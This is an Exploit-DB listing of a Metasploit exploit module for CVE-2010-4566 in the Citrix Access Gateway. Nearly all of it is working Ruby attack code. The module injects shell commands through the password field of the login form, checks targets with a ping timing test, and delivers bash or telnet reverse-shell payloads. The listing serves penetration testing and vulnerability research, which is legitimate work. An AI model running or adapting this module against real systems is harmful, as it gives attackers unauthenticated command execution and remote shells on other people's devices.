Citrix Access Gateway - Command Execution (Metasploit)

EDB-ID:

16916




Platform:

Linux

Date:

2011-03-03


##
# $Id: citrix_access_gateway_exec.rb 11873 2011-03-03 20:51:12Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Citrix Access Gateway Command Execution',
			'Description'    => %q{
					The Citrix Access Gateway provides support for multiple authentication types.
				When utilizing the external legacy NTLM authentication module known as
				ntlm_authenticator the Access Gateway spawns the Samba 'samedit' command
				line utility to verify a user's identity and password.  By embedding shell
				metacharacters in the web authentication form it is possible to execute
				arbitrary commands on the Access Gateway.
			},
			'Author'         =>
				[
					'George D. Gal', # Original advisory
					'Erwin Paternotte', # Exploit module
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 11873 $',
			'References'     =>
				[
					[ 'CVE', '2010-4566' ],
					[ 'OSVDB', '70099' ],
					[ 'BID', '45402' ],
					[ 'URL', 'http://www.vsecurity.com/resources/advisory/20101221-1/' ]
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'       => 127,
					'DisableNops' => true,
					'Compat'      =>
						{
							'PayloadType' => 'cmd cmd_bash',
							'RequiredCmd' => 'generic telnet bash-tcp'
						}
				},
			'DefaultOptions' =>
				{
					'WfsDelay' => 30
				},
			'Platform'       => [ 'unix' ],
			'Arch'           => ARCH_CMD,
			'Targets'        => [[ 'Automatic', { }]],
			'DisclosureDate' => 'Dec 21 2010',
			'DefaultTarget'  => 0))

		register_options(
			[
				Opt::RPORT(443),
				OptBool.new('SSL', [ true, 'Use SSL', true ]),
			], self.class)

	end

	def post(command, background)
		username = rand_text_alphanumeric(20)

		if background
			sploit = Rex::Text.uri_encode('|' + command + '&')
		else
			sploit = Rex::Text.uri_encode('|' + command)
		end

		data = "SESSION_TOKEN=1208473755272-1381414381&LoginType=Explicit&username="
		data << username
		data << "&password="
		data << sploit

		res = send_request_cgi({
			'uri'     => '/',
			'method'  => 'POST',
			'data'    => data
		}, 25)
	end

	def check
		print_status("Attempting to detect if the Citrix Access Gateway is vulnerable...")

		# Try running/timing 'ping localhost' to determine is system is vulnerable
		start = Time.now
		post("ping -c 10 127.0.0.1", false)
		elapsed = Time.now - start
		if elapsed >= 3
			return Exploit::CheckCode::Vulnerable
		end

		return Exploit::CheckCode::Safe
	end

	def exploit
		cmd = payload.encoded

		if not post(cmd, true)
			raise RuntimeError, "Unable to execute the desired command"
		end
	end
end